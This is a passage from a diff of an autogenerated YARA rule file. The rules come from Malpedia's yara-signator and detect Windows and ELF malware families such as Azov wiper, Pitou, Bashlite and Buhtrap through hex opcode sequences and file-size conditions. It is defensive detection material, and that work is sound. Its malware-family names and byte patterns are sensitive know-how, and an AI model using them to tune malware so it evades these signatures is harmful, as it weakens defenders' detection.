668944244e c744244400000000 eb0a 8b442444 } + $sequence_5 = { 418bc8 44888438d8000000 458d5801 44019fd8000100 418bc5 410fafc4 44899c24c0040000 } + $sequence_6 = { ff15???????? 33d2 b903000000 f7f1 89442428 c744242400000000 ba09000000 } + $sequence_7 = { eb0c 498b4770 4b8d0c76 4c8d2cc8 4d85ed 750a bb27030980 } + $sequence_8 = { 8d5808 e9???????? 488b4c2460 488d85b0000000 4533c0 4889442420 4d8bcf } + $sequence_9 = { 4d85e4 7416 498bcf e8???????? 0c80 488bcd 8ad0 } condition: - 7 of them and filesize <661504 + 7 of them and filesize <606208 } -rule MALPEDIA_Win_Azov_Wiper_Auto : FILE +rule MALPEDIA_Win_Zlob_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "76e58a84-2854-5930-bc99-d7f7733110e9" + id = "4fad6172-d1e7-5d84-af68-8861117c390a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.azov_wiper_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zlob_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "b6d671c16b8dc6a9d2872e0b93ec5fc03d8fe956d8f9494205bfd799936a0b79" + logic_hash = "31e17a6dc34e33dac3ecb614a6996745d9221261fdc2596cb1f9e420f9dc5bc9" score = 75 quality = 75 tags = "FILE" @@ -185683,32 +188470,32 @@ rule MALPEDIA_Win_Azov_Wiper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8bc8 4885c0 7455 488d442440 } - $sequence_1 = { 488d5201 6685c0 75ee 488b05???????? 488bcb 488b10 ff9250010000 } - $sequence_2 = { 41ff9288010000 85c0 740f 4881c79a020000 4889bc2410030000 483bbc2418030000 0f8c73ffffff } - $sequence_3 = { 48894c2440 4533c0 48898c2470080000 4c8b10 488d842470080000 } - $sequence_4 = { 33d2 33c9 48897c2420 4c8b10 41ff92b0000000 8bce } - $sequence_5 = { 4c8b00 41ff5058 85c0 0f84c6000000 4c89b42480000000 448d4b04 } - $sequence_6 = { 488bcb 4c8b10 41ff9288010000 85c0 740f 4881c79a020000 } - $sequence_7 = { 4883ec20 4080e4f0 c645f356 c645f469 c645f572 } - $sequence_8 = { 488945f8 4883ec08 48890424 4883ec08 } - $sequence_9 = { 0f8493000000 488bd0 488bcb 482bd3 } + $sequence_0 = { ffd6 ffd7 68???????? e8???????? c70424???????? 68???????? } + $sequence_1 = { 50 ff742434 ff15???????? ff742414 e8???????? ff74242c 8b4c243c } + $sequence_2 = { 5d 8bcb 5b 83c404 ff6024 51 51 } + $sequence_3 = { 50 e8???????? 8b4508 83c410 83780400 7533 8d85f0eaffff } + $sequence_4 = { 58 2bc2 03c8 f644240c02 7504 8d4c7102 8bc1 } + $sequence_5 = { 56 8b35???????? 57 8b3d???????? 0f8407020000 837d10ff } + $sequence_6 = { ffd7 8b442414 6a01 6a00 6a00 ff30 ff15???????? } + $sequence_7 = { ff74242c 8901 50 e8???????? 83c410 ffd3 } + $sequence_8 = { ff75e8 8d4dbc e8???????? ff45f8 8b45f8 3b45e4 0f8cedfdffff } + $sequence_9 = { 57 8b3d???????? 89442410 8b4508 8b4c2410 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Pitou_Auto : FILE +rule MALPEDIA_Win_Jasus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8ffbef2d-72c2-5fd0-bc80-d9aaff0b569e" + id = "f0f57156-3d71-51a0-8417-ea38ed1ea26d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pitou_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jasus_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "e9d79d3aa0dabaeee54f58f2a742dc54ca18da56fbfe8d220d28635b8791c96b" + logic_hash = "8597018770d02606e940d401ffb7afc270f8035f09e3cd93e76c94000290c2f1" score = 75 quality = 75 tags = "FILE" @@ -185722,32 +188509,32 @@ rule MALPEDIA_Win_Pitou_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bda c1e305 03c3 8bda } - $sequence_1 = { ac 8bda c1e305 03c3 8bda c1eb02 03c3 } - $sequence_2 = { c1e305 03c3 8bda c1eb02 } - $sequence_3 = { 8a6201 80f457 8acc 80e103 } - $sequence_4 = { 8bda c1e305 03c3 8bda c1eb02 03c3 33d0 } - $sequence_5 = { 8a12 80f257 8ada c0eb02 } - $sequence_6 = { c1e305 03c3 8bda c1eb02 03c3 33d0 } - $sequence_7 = { 53 80ef18 80ff10 5b } - $sequence_8 = { 80f457 8acc 80e103 8aec } - $sequence_9 = { ac 8bda c1e305 03c3 8bda } + $sequence_0 = { 50 51 6689956cffffff ffd3 83c40c 833d????????00 } + $sequence_1 = { 8955f8 8955e8 8955ec c745f0ffffffff 84c0 7410 8d642400 } + $sequence_2 = { 84c0 7543 8b45fc 85c0 745a 68???????? } + $sequence_3 = { 39580c 0f828d000000 0fb71437 8b4e1a 33c0 89442414 89442418 } + $sequence_4 = { 8945f0 894df8 b801000000 837dec00 745d 85c0 7559 } + $sequence_5 = { 8b1481 40 89560c 8906 8b5e0c 895e14 8a03 } + $sequence_6 = { 47 897e14 897e70 c686c800000043 c6864b01000043 c74668d0f24100 6a0d } + $sequence_7 = { 894de8 8945e4 c745ec00c94100 c745f001010000 c745f41e010000 c745f80f000000 } + $sequence_8 = { 8bc6 c1f805 8d1485809d4300 8b0a } + $sequence_9 = { e8???????? 0fb71d???????? 8945fc 0fb705???????? 56 68???????? e8???????? } condition: - 7 of them and filesize <1106944 + 7 of them and filesize <507904 } -rule MALPEDIA_Elf_Bashlite_Auto : FILE +rule MALPEDIA_Win_Heriplor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ca6414ba-2b9c-5f1f-bb06-5810c9d01c02" + id = "d711b4d9-3914-58b9-9b88-9214444e3dee" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.bashlite_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.heriplor_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "38a010b68cee7bf4f221088e2245d1e5d0f927b085c409c35c3789c20373d434" + logic_hash = "bf5971e2bb98e2180b60da71db38d7f4898a68723f2588a48c70334b337b7d93" score = 75 quality = 75 tags = "FILE" @@ -185761,32 +188548,32 @@ rule MALPEDIA_Elf_Bashlite_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb19 e8???????? c70016000000 e8???????? c70016000000 } - $sequence_1 = { 21d0 3345fc c9 c3 55 } - $sequence_2 = { 750c e8???????? 8b00 83f873 } - $sequence_3 = { 8b85ecefffff c9 c3 55 } - $sequence_4 = { 760f e8???????? c7001c000000 31c0 } - $sequence_5 = { 31c0 eb19 e8???????? c70016000000 } - $sequence_6 = { e8???????? 89c2 89d0 c1e81f 01d0 d1f8 } - $sequence_7 = { 85c0 750c c785ecefffff01000000 eb0a c785ecefffff00000000 } - $sequence_8 = { 85c0 750c c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff } - $sequence_9 = { c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff c9 c3 } + $sequence_0 = { c20c00 55 89e5 56 57 33c9 648b4130 } + $sequence_1 = { 40 5b 59 89ec } + $sequence_2 = { 8a08 84c9 740d 80c960 01cb c1e301 } + $sequence_3 = { 668b13 8b0491 01f8 5f 5e 89ec 5d } + $sequence_4 = { 89e5 51 53 33db 33c9 8b4508 } + $sequence_5 = { 85ff 7420 46 46 } + $sequence_6 = { 7407 83c204 43 43 ebe6 33d2 668b13 } + $sequence_7 = { 01fb 8b32 01fe 6a01 ff750c } + $sequence_8 = { 3b5d0c 7401 40 5b } + $sequence_9 = { 01f9 01fa 01fb 8b32 01fe 6a01 ff750c } condition: - 7 of them and filesize <2310144 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Sidewinder_Auto : FILE +rule MALPEDIA_Win_Acronym_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "476f112b-78c8-59d9-8623-54ca0fa7fd69" + id = "3a02b0db-7dab-59f7-8844-7d3e20bbfec7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sidewinder_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acronym_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "eff1c6e4779cf645096e1bcfd05e39d6cbab1c4bd8a928e81992c305a580a163" + logic_hash = "f0c8874a39c6e7d48d0efb9f6335d89bb8e6f6e657bab8b7e1fc238f6642ecb8" score = 75 quality = 75 tags = "FILE" @@ -185800,32 +188587,32 @@ rule MALPEDIA_Win_Sidewinder_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83a570fdffff00 8b45c4 89853cffffff 8d8544ffffff 50 8b853cffffff 8b00 } - $sequence_1 = { 50 e8???????? 89852cfbffff e8???????? 8d8568fbffff 50 e8???????? } - $sequence_2 = { e8???????? 8d45c4 50 8d45a0 50 e8???????? 8d45a0 } - $sequence_3 = { 8d45e0 50 e8???????? 0fbf45e8 50 ff75e0 e8???????? } - $sequence_4 = { 7d20 6a30 68???????? ff35???????? ffb534ffffff e8???????? 898504ffffff } - $sequence_5 = { 8b00 ff7508 ff5004 8b450c 832000 8d45e8 50 } - $sequence_6 = { e8???????? 8bd0 8d4de8 e8???????? 8d45c8 50 8d45d8 } - $sequence_7 = { ff5020 dbe2 898528ffffff 83bd28ffffff00 7d1d 6a20 68???????? } - $sequence_8 = { 8945dc 8d45e4 50 8b45dc 8b00 ff75dc ff5024 } - $sequence_9 = { ff75b8 ff75d8 6aff 6820110000 e8???????? 83650c00 eb27 } + $sequence_0 = { 89550c 8b4510 034508 8a08 884dff 8b5510 03550c } + $sequence_1 = { 8b55e8 8a45f4 88040a ebac 33c9 75fc 8be5 } + $sequence_2 = { 50 ff15???????? 8945f8 8b4dfc 8b5110 52 8b45fc } + $sequence_3 = { e8???????? 8bc8 e8???????? 0fb6d0 85d2 0f85d4000000 8b450c } + $sequence_4 = { c745fc00000000 eb09 8b45fc 83c001 8945fc 8b4df4 83c104 } + $sequence_5 = { 6a00 6a00 ff15???????? b901000000 85c9 0f84fd000000 c745f000000000 } + $sequence_6 = { 2b55bc 8955b8 8b45b8 8945cc 33c9 75fc 8b55dc } + $sequence_7 = { 8b0c90 83c101 8b55f4 8b45f0 0fb754505e 8b45ec 69c008040000 } + $sequence_8 = { 8b4508 50 e8???????? 83c410 ebaa 8b45c4 69c0c51d0000 } + $sequence_9 = { 69d208040000 8b7508 8d941660b10000 89048a 8b45f4 8b4df0 0fb754411c } condition: - 7 of them and filesize <679936 + 7 of them and filesize <466944 } -rule MALPEDIA_Win_Pipemon_Auto : FILE +rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fb1257dc-1899-57a8-9bb3-37873100ec17" + id = "05fc3e6a-bc1e-5e27-996e-6357de6a9e2c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pipemon_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_bolid_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "a7cf49399560b8b73200f34644a487f3922c8589009d7d641339ef3a3238ec7b" + logic_hash = "938464f6c09d72401fc04aa41413a321a3c389b634663fb70512029f39441d8b" score = 75 quality = 75 tags = "FILE" @@ -185839,32 +188626,32 @@ rule MALPEDIA_Win_Pipemon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 418bf8 4903fe 85db 0f84a1000000 6690 49634e3c } - $sequence_1 = { 7516 488d05bd360100 488b4c2430 483bc8 7405 e8???????? 488b05???????? } - $sequence_2 = { 85c0 7427 488b4c2438 488d1526d90000 ff15???????? } - $sequence_3 = { b906000000 48898620020000 0fb7c0 66f3ab 488d3d2c3b0100 } - $sequence_4 = { 488d4c2438 e8???????? 4c8d4820 4889442420 4c8bc3 488d5590 488d4c2438 } - $sequence_5 = { 4881c458010000 c3 83f801 7529 b803000000 488b8c2440010000 4833cc } - $sequence_6 = { 458d4d02 458bc7 488d542450 488bc8 } - $sequence_7 = { e8???????? 4881c498000000 c3 448b442430 488d1543fe0100 33c0 488d4c2440 } - $sequence_8 = { ffc8 3d03010000 7734 488d44244c 488bd7 } - $sequence_9 = { 80bd8008000000 0f84b6010000 4d85ed 0f84b6000000 } + $sequence_0 = { 741e 8b4c240c 51 ff15???????? 56 68???????? e8???????? } + $sequence_1 = { e8???????? 8d8c24d4000000 c684242c02000004 51 8bcd e8???????? 8b15???????? } + $sequence_2 = { 8bcb e8???????? 85c0 0f84fa000000 8b550c 42 } + $sequence_3 = { 49 885c2454 51 68???????? 8d4c2444 } + $sequence_4 = { 83c40c 8b15???????? 8d4de4 52 } + $sequence_5 = { e8???????? 6a01 8d4c2440 c644245800 e8???????? 8b4c2460 } + $sequence_6 = { f3a4 8b35???????? 8d4c2410 51 6a26 52 89442420 } + $sequence_7 = { 8b458c 3bc3 7505 b8???????? } + $sequence_8 = { 50 ff5104 33db 6a01 } + $sequence_9 = { 53 880e 8bce e8???????? 8b15???????? 8d44245c } condition: - 7 of them and filesize <389120 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Quickheal_Auto : FILE +rule MALPEDIA_Win_Tildeb_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1144a28c-6891-50e3-aab7-fbd2738d1ce6" + id = "e4d2b91f-a0b2-5435-bc42-03da5ff53194" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quickheal_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tildeb_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "c8252dc1fbd623ed33de5c38485302af864b4c120786c74e672f39f82eb29422" + logic_hash = "5eed583e8de669a9ccc3c14def00c8dc34c80dd8549b8a02a48ebd34aae4a3b5" score = 75 quality = 75 tags = "FILE" @@ -185878,32 +188665,32 @@ rule MALPEDIA_Win_Quickheal_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7ce2 b814010000 8a8c28f8feffff 888c0484000000 40 3d30010000 72ea } - $sequence_1 = { 3bf3 0f840b030000 8d4e02 8d542424 51 } - $sequence_2 = { ff15???????? 8d542410 8d8424fc060000 52 6819000200 53 } - $sequence_3 = { 49 51 6a06 52 ffd5 83c408 } - $sequence_4 = { 2bce 51 56 50 56 e8???????? 83c410 } - $sequence_5 = { 8d445d0c 83c408 33f6 6683f93b } - $sequence_6 = { 83c102 3bc6 7cf0 5f } - $sequence_7 = { 7207 885101 04fc eb04 c6410100 3c02 7209 } - $sequence_8 = { f7d1 49 8dbc2414010000 8bd1 83c9ff f2ae a1???????? } - $sequence_9 = { 52 ffd7 85c0 7418 8b442410 c744241404010000 50 } + $sequence_0 = { 8d4dbc 51 56 ff15???????? 56 ff15???????? } + $sequence_1 = { 6a00 6a00 ff15???????? 85c0 0f84f5090000 68???????? } + $sequence_2 = { 57 6a40 c644241300 ff15???????? 50 ff15???????? } + $sequence_3 = { 85c0 7445 50 68???????? 68???????? ff15???????? 83c40c } + $sequence_4 = { e8???????? 6a00 6a08 8d85d4f5ffff 50 } + $sequence_5 = { 68???????? 57 56 ff15???????? 8945bc 85c0 7457 } + $sequence_6 = { c3 b815000000 5e 81c494010000 c3 f7d8 5e } + $sequence_7 = { eb40 8d458c 50 68???????? eb35 } + $sequence_8 = { 53 55 8bac2410010000 56 8b35???????? 57 68???????? } + $sequence_9 = { 6800000088 68???????? 68???????? 6a00 ff15???????? 8b0d???????? } condition: - 7 of them and filesize <553984 + 7 of them and filesize <8532488 } -rule MALPEDIA_Win_Final1Stspy_Auto : FILE +rule MALPEDIA_Win_Woody_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7c2b072b-c27f-54e3-a7df-2dc853163db8" + id = "35fc0a5e-5caa-5b81-a357-ce6a48801a6d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.final1stspy_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.woody_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "654817f55704ecafec1c10904f1a6a25212804a4fb3c152f1d4aecbab6ecef0c" + logic_hash = "d359ba0a50d4da9f9c37f195345e1d8ee165deec7ea255ed2ce67ccf9ad5785a" score = 75 quality = 75 tags = "FILE" @@ -185917,32 +188704,32 @@ rule MALPEDIA_Win_Final1Stspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03d0 8b45fc 8a4803 c1e206 80f93d 7508 } - $sequence_1 = { 51 56 8d55fc c745fc00000000 e8???????? 8bf0 } - $sequence_2 = { 8a1d???????? 8b4dfc 83c104 894dfc } - $sequence_3 = { eb2e 85ff 7594 b8???????? 6690 3ad9 } - $sequence_4 = { 81e7ff070080 7908 4f 81cf00f8ffff } - $sequence_5 = { 0f114c0f10 83c120 3bca 7cd4 3bce } - $sequence_6 = { 84db 7410 8a11 8acb 3aca 7425 8a4801 } - $sequence_7 = { 81cf00f8ffff 47 33f6 85ff 7e0a } - $sequence_8 = { 8945fc 57 8d7e01 8a06 } - $sequence_9 = { 7410 8a11 8acb 3aca } + $sequence_0 = { 85c0 59 7412 8d4604 50 8d85e4feffff } + $sequence_1 = { 0f8501ffffff 53 ff15???????? a1???????? 85c0 7410 6860ea0000 } + $sequence_2 = { 8975ec 3bce 8b35???????? 894ddc 0f86b1000000 8d580a 8b4df4 } + $sequence_3 = { 8d8e10010000 c645fc01 e8???????? 8d8e18010000 c645fc02 e8???????? 8d8e20010000 } + $sequence_4 = { 50 e8???????? 8b45f4 83c424 813800000080 7239 8b75c8 } + $sequence_5 = { 59 5b 0f94c0 5f 5e c9 c20c00 } + $sequence_6 = { 48 0f8592000000 6a00 6a00 6a00 ff15???????? } + $sequence_7 = { 85db 7503 57 eb15 8d45fc 6a00 50 } + $sequence_8 = { 8945e0 294de0 894d14 8b45e0 8b4d14 03c1 8d4db0 } + $sequence_9 = { 3bcb 89442450 7412 8b8e0c010000 c74424540e000000 3bcb 7504 } condition: - 7 of them and filesize <557056 + 7 of them and filesize <409600 } -rule MALPEDIA_Win_Heyoka_Auto : FILE +rule MALPEDIA_Win_Banpolmex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "86cada76-df01-530f-8812-d25a9cd3eeea" + id = "f5c73e0b-c575-562f-9127-4bdfc5c88735" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heyoka" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.heyoka_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.banpolmex_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "a93bcd2aa0b2cb88631752f25ba4416145dab56370097ba7d811f589f6be863b" + logic_hash = "5c80d00898c7981631095abf56b16c379bf161bce0c3d518d50cadc7dd22c1a6" score = 75 quality = 75 tags = "FILE" @@ -185956,32 +188743,32 @@ rule MALPEDIA_Win_Heyoka_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4d0c 8b510c 83c204 52 8b45fc 50 } - $sequence_1 = { c745f800000000 c745f000000000 c745f400000000 c745ec00000000 8b4514 6bc005 c1e803 } - $sequence_2 = { 8b45dc 50 e8???????? 83c410 8945d8 837dd800 750c } - $sequence_3 = { 83ec08 894df8 8b45f8 c700???????? 8b4df8 c7810c09000000000000 8b55f8 } - $sequence_4 = { e8???????? 83c408 8b5518 52 8b45dc 83c004 } - $sequence_5 = { e8???????? 83c408 eb17 837d0803 7511 68???????? } - $sequence_6 = { 8bec 83ec08 8b4508 50 6a01 e8???????? 83c408 } - $sequence_7 = { 7423 8bce 8bc6 c1f905 83e01f 8b0c8da0d80110 } - $sequence_8 = { 51 e8???????? 83c404 8b45e0 83c00c 8be5 } - $sequence_9 = { 8955f8 8b45fc 8b4df4 8b55f8 0faf948134e30000 8b4df4 8bc2 } + $sequence_0 = { 7419 4c8b0f 8bd0 41b801000000 498bcc e8???????? 4883f801 } + $sequence_1 = { ff15???????? 488d1530980800 488bcb 488905???????? ff15???????? 488d1529980800 488bcb } + $sequence_2 = { c3 488d15ea560200 488bcf e8???????? b80a000000 488b5c2460 4883c420 } + $sequence_3 = { 0f97c0 890d???????? 4883c428 c3 8b0d???????? 44891d???????? 3bc1 } + $sequence_4 = { 448d4201 4d8bb4c5a8010000 488bcb e8???????? 85c0 7919 488d156ca70100 } + $sequence_5 = { 4d016810 4d016018 49017020 49017828 49015830 4d015838 4d015040 } + $sequence_6 = { 660f1f440000 483bd5 7733 488bca 4869c988000000 4903c9 428b44210c } + $sequence_7 = { 4883ec28 488b0d???????? 4885c9 7409 83caff ff15???????? 33c0 } + $sequence_8 = { 4c8b5c2420 488b442428 4c011b 480107 0fb7442438 66ffc0 6689442438 } + $sequence_9 = { 4c897c2458 3c02 0f85a4000000 41b803000000 4533ff 898c24a8000000 44898424b0000000 } condition: - 7 of them and filesize <270336 + 7 of them and filesize <1555456 } -rule MALPEDIA_Win_Unidentified_108_Auto : FILE +rule MALPEDIA_Win_Mortalkombat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "91d0ee32-15d3-5f4b-b0c7-e219a3fb056f" + id = "5bbf17fe-00b4-5a92-b5e3-f942b94b6ce0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_108_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mortalkombat_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "bc8d7e8276cd214c62a44b786052de8d0d6c82c70c52e7e29cb797627cab2825" + logic_hash = "7d4e235b241a7bc491c490ef8ff26987513d97053d43652b54aa2deceb4dd9ea" score = 75 quality = 75 tags = "FILE" @@ -185995,32 +188782,32 @@ rule MALPEDIA_Win_Unidentified_108_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d05c7580100 4a8b0ce8 42385cf938 7d4f 400fbece 4084f6 } - $sequence_1 = { 0f8493010000 488d2d3a100100 83635000 83632c00 e9???????? 48ff4318 837b2800 } - $sequence_2 = { 660feb0d???????? 4c8d0d44950000 f20f5cca f2410f590cc1 660f28d1 660f28c1 4c8d0d0b850000 } - $sequence_3 = { 7426 488d5540 803201 488d5201 41ffc0 488d4540 498bcc } - $sequence_4 = { 4c8d05a8310100 83e23f 488d14d2 498b04c0 f644d03801 } - $sequence_5 = { 488d1dd6db0100 458bc5 498bcc 48ffc1 4438040b 75f7 4885c9 } - $sequence_6 = { 458bc5 498bc4 90 48ffc0 44380401 } - $sequence_7 = { 0fb6557f 4889451f 83f201 488d05dbc90000 49c1e302 4889452f 03d2 } - $sequence_8 = { 488d9588000000 803201 488d5201 41ffc0 488d8588000000 } - $sequence_9 = { 7350 488bca 4c8d051d310100 83e13f 488bc2 48c1f806 } + $sequence_0 = { 33d2 ad 3382b96d4000 ab 83c204 } + $sequence_1 = { 6a00 6803800000 ff75fc e8???????? 83f800 7e35 6a00 } + $sequence_2 = { 2bc1 81ebb979379e 8bc8 c1e104 } + $sequence_3 = { 83f8ff 7402 eb67 6a00 6a00 6a02 } + $sequence_4 = { e8???????? 50 ff75ac e8???????? 8945a4 33c0 50 } + $sequence_5 = { 803d????????01 7519 68???????? 68???????? 68???????? } + $sequence_6 = { c705????????f4010000 68???????? e8???????? a3???????? a0???????? } + $sequence_7 = { ff7514 6a01 6a00 ff7510 ff75f8 } + $sequence_8 = { 68???????? e8???????? 83c710 6a10 } + $sequence_9 = { 50 e8???????? ebd8 8b45bc } condition: - 7 of them and filesize <307200 + 7 of them and filesize <1224704 } -rule MALPEDIA_Win_Buhtrap_Auto : FILE +rule MALPEDIA_Win_Pitou_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "25eb4b11-3715-52d0-a7c7-9dac6aa80ccc" + id = "8ffbef2d-72c2-5fd0-bc80-d9aaff0b569e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buhtrap_auto.yar#L1-L162" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pitou_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "d4e0c8ac83aa0b6c13a2f72737ffccb143e82cce7ba2ea9d1a844cc8381c4b50" + logic_hash = "e9d79d3aa0dabaeee54f58f2a742dc54ca18da56fbfe8d220d28635b8791c96b" score = 75 quality = 75 tags = "FILE" @@ -186034,37 +188821,32 @@ rule MALPEDIA_Win_Buhtrap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 59 84c0 0f8435010000 } - $sequence_1 = { 7423 8b44240c 33d2 6a64 59 f7f1 } - $sequence_2 = { c3 b301 ebe1 55 8bec 83ec18 } - $sequence_3 = { 6a00 50 8d442414 c744242c04000000 } - $sequence_4 = { 6a06 8bce e8???????? 8a1d???????? 56 } - $sequence_5 = { 0f8489000000 837d1400 747b 6a09 59 33c0 8d7c242c } - $sequence_6 = { 7405 e8???????? 85f6 7907 32c0 e9???????? 8365f000 } - $sequence_7 = { ffd6 57 ffd6 33c0 85db 0f94c0 5f } - $sequence_8 = { 754e 6a01 53 50 } - $sequence_9 = { 53 68???????? 890e 894604 e8???????? 50 } - $sequence_10 = { 897dfc e8???????? 59 84c0 0f8497000000 3bdf } - $sequence_11 = { 6aff ff742420 ff7624 ffd7 ff742418 e8???????? } - $sequence_12 = { ffd7 6a00 689385e784 6a28 68???????? } - $sequence_13 = { 894624 8b442414 894604 a808 7466 } - $sequence_14 = { 753d 8b4e2c 83c104 e8???????? e8???????? } + $sequence_0 = { 8bda c1e305 03c3 8bda } + $sequence_1 = { ac 8bda c1e305 03c3 8bda c1eb02 03c3 } + $sequence_2 = { c1e305 03c3 8bda c1eb02 } + $sequence_3 = { 8a6201 80f457 8acc 80e103 } + $sequence_4 = { 8bda c1e305 03c3 8bda c1eb02 03c3 33d0 } + $sequence_5 = { 8a12 80f257 8ada c0eb02 } + $sequence_6 = { c1e305 03c3 8bda c1eb02 03c3 33d0 } + $sequence_7 = { 53 80ef18 80ff10 5b } + $sequence_8 = { 80f457 8acc 80e103 8aec } + 